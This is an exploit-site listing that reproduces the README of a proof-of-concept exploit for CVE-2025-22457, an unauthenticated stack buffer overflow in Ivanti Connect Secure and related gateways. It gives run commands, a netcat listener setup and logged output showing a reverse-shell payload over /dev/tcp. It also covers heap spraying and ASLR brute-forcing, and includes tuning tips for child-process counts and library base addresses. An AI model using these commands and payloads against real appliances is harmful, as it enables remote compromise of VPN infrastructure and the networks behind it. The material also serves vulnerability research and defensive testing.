Exploit for Out-of-bounds Write in Ivanti Connect Secure CVE-2025-22457

Name: Exploit for Out-of-bounds Write in Ivanti Connect Secure CVE-2025-22457
Rating: 5 (51 reviews)
2025-04-09 | CVSS 9.8
## https://sploitus.com/exploit?id=89582FE3-BE9E-5F53-9CA5-231D50587370
# PoC for CVE-2025-22457
_A remote unauthenticated stack based buffer overflow affecting Ivanti Connect Secure, Pulse Connect Secure, Ivanti Policy Secure, and ZTA Gateways_

## Overview

This is a proof of concept exploit to demonstrate exploitation of CVE-2025-22457. For a complete technical analysis of the vulnerability and exploitation strategy, please see our Rapid7 Analysis here: 

https://attackerkb.com/topics/0ybGQIkHzR/cve-2025-22457/rapid7-analysis

## Usage

We can run this script against a vulnerable Ivanti Connect Secure target, version 22.7r2.4 as follows:

Start a netcat listener to catch the reverse shell.

```console
C:\>ncat -lnvkp 8080
```

Run the exploit and brute force ASLR (This will be slow).

```console
C:\>ruby CVE-2025-22457.rb -t 192.168.86.111 -p 443 --lhost 192.168.86.35 --lport 8080
[2025-04-10 16:21:13 +0100] [+] Targeting https://192.168.86.111:443/
[2025-04-10 16:21:13 +0100] [+] Payload: bash -i >& /dev/tcp/192.168.86.35/8080 0>&1
[2025-04-10 16:21:13 +0100] [+] Detected version 22.7.2.3597
[2025-04-10 16:21:13 +0100] [+] Starting...
[2025-04-10 16:21:13 +0100] [+] Attempt 0, trying libdsplibs.so @ 0xf64ca000
[2025-04-10 16:21:13 +0100]     Making connections...
[2025-04-10 16:21:18 +0100]     Spraying...
[2025-04-10 16:22:27 +0100]     Triggering..
```

When it works you will get a reverse shell.

```console
C:\>ncat -lnvkp 8080
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::8080
Ncat: Listening on 0.0.0.0:8080
Ncat: Connection from 192.168.86.111.
Ncat: Connection from 192.168.86.111:20746.
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.2$ id
id
uid=104(nr) gid=104(nr) groups=104(nr)
bash-4.2$ uname -a
uname -a
Linux localhost2 4.17.00.35-selinux-jailing-production #1 SMP Tue Jun 18 16:25:33 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
bash-4.2$
```

## Debug

### Web Child Processes

Depending on the underlying hardware, the number of CPUs available to the target appliance will dictate the number of child processes the `/home/bin/web` binary will spawn. As all incoming HTTPS requests will be distributed evenly between these children, we need to account for this and perform the heap spray enough times for all child processes. We need to do this as when we trigger the vulnerability, we cannot know what child process we will trigger it in. So we need the heap spray to be present in every child process.

* 1 vCPU - 1 web process, no children
* 2 vCPU - 1 web parent, 2 children
* 4 vCPU - 1 web parent, 4 children (This is the default, and corresponds to the Ivanti Connect Secure ISA4000-V platform)
* 8 vCPU - 1 web parent, 8 children (This corresponds to the Ivanti Connect Secure ISA6000-V platform)

For example, in a rooted vulnerable appliance, run the following to see the number of child `/home/bin/web` processes:

```console
bash-4.2# ps -Al | grep web
ps -Al | grep web
4 S   104  3012  2394  0  80   0 - 26313 -      ?        00:00:00 web
4 S   104  3013  2394  0  80   0 - 24931 -      ?        00:00:00 web80
1 S   104  4947  3012  2  80   0 - 28209 -      ?        00:01:27 web
1 S   104  5217  3012  1  80   0 - 31527 -      ?        00:00:49 web
1 S   104  5695  3012  0  80   0 - 28199 -      ?        00:00:00 web
1 S   104  5715  3012  0  80   0 - 28199 -      ?        00:00:00 web
bash-4.2#
```

You can specify the expected number of web children via the `--web_children` argument, for example:

```console
C:\>ruby CVE-2025-22457.rb -t 192.168.86.111 -p 443 --lhost 192.168.86.35 --lport 8080 --web_children 4
```

### libdsplibs Base Address

If you are testing the PoC on a local system, you may want to avoid bruteforcing the `libdsplibs` base address. In this scenario, you can pass a known base address to the PoC via the `--libdsplibs` argument. For example, in a rooted vulnerable appliance, run the following:

```console
bash-4.2# ps -A| grep web
ps -A| grep web
 3200 ?        00:00:01 web80
20536 ?        00:00:02 web
bash-4.2# cat /proc/20536/maps | grep libdsplibs
cat /proc/20536/maps | grep libdsplibs
f642e000-f7994000 r-xp 00000000 fc:02 171879                             /home/lib/libdsplibs.so
f7994000-f7995000 ---p 01566000 fc:02 171879                             /home/lib/libdsplibs.so
f7995000-f79aa000 r--p 01566000 fc:02 171879                             /home/lib/libdsplibs.so
f79aa000-f79e3000 rw-p 0157b000 fc:02 171879                             /home/lib/libdsplibs.so
bash-4.2#
```

Then you can pass the know base address to the PoC as follows:

```console
C:\>ruby CVE-2025-22457.rb -t 192.168.86.111 -p 443 --lhost 192.168.86.35 --lport 8080 --web_children 4 --libdsplibs 0xf642e000
[2025-04-10 16:21:13 +0100] [+] Targeting https://192.168.86.111:443/
[2025-04-10 16:21:13 +0100] [+] Payload: bash -i >& /dev/tcp/192.168.86.35/8080 0>&1
[2025-04-10 16:21:13 +0100] [+] Detected version 22.7.2.3597
[2025-04-10 16:21:13 +0100] [+] Starting...
[2025-04-10 16:21:13 +0100] [+] Attempt 0, trying libdsplibs.so @ 0xf642e000
[2025-04-10 16:21:13 +0100]     Making connections...
[2025-04-10 16:21:18 +0100]     Spraying...
[2025-04-10 16:22:27 +0100]     Triggering...
```